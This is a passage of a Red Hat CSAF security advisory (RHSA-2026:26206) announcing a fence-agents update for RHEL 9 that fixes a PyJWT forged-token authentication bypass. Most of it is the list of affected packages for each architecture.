| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64 | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for fence-agents is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. \n\nSecurity Fix(es):\n\n* python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens (CVE-2026-48526)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:26206",
"url": "https://access.redhat.com/errata/RHSA-2026:26206"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_26206.json"
}
],
"title": "Red Hat Security Advisory: fence-agents security update",
"tracking": {
"current_release_date": "2026-06-16T21:43:15+00:00",
"generator": {
"date": "2026-06-16T21:43:15+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.0.0"
}
},
"id": "RHSA-2026:26206",
"initial_release_date": "2026-06-16T12:16:14+00:00",
"revision_history": [
{
"date": "2026-06-16T12:16:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-16T12:16:14+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-16T21:43:15+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-0:4.10.0-110.el9_8.3.src",
"product": {
"name": "fence-agents-0:4.10.0-110.el9_8.3.src",
"product_id": "fence-agents-0:4.10.0-110.el9_8.3.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents@4.10.0-110.el9_8.3?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-aliyun-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-aliyun-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-aliyun-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-aliyun@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-all-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-aws-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-aws-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-aws-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-aws@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-azure-arm-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-azure-arm-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-azure-arm-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-azure-arm@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-compute-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-compute-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-compute-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-compute@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-gce-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-gce-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-gce-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-gce@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-openstack@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virt@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-cpg@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-libvirt@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-multicast@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-serial@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-tcp@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ha-cloud-support@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virt-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-cpg-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-libvirt-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-multicast-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-serial-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-virtd-tcp-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product": {
"name": "ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_id": "ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ha-cloud-support-debuginfo@4.10.0-110.el9_8.3?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-all-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.10.0-110.el9_8.3?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product_id": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt-debuginfo@4.10.0-110.el9_8.3?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-all-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-compute-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-compute-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-compute-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-compute@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-openstack@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ha-cloud-support@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product_id": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt-debuginfo@4.10.0-110.el9_8.3?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-all-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-all-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-all@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-redfish@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-zvm@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-debugsource-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debugsource@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-debuginfo@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kdump-debuginfo@4.10.0-110.el9_8.3?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product_id": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-kubevirt-debuginfo@4.10.0-110.el9_8.3?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "fence-agents-amt-ws-0:4.10.0-110.el9_8.3.noarch",
"product": {
"name": "fence-agents-amt-ws-0:4.10.0-110.el9_8.3.noarch",
"product_id": "fence-agents-amt-ws-0:4.10.0-110.el9_8.3.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/fence-agents-amt-ws@4.10.0-110.el9_8.3?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "fence-agents-apc-0:4.10.0-110.el9_8.3.noarch",
"product": {
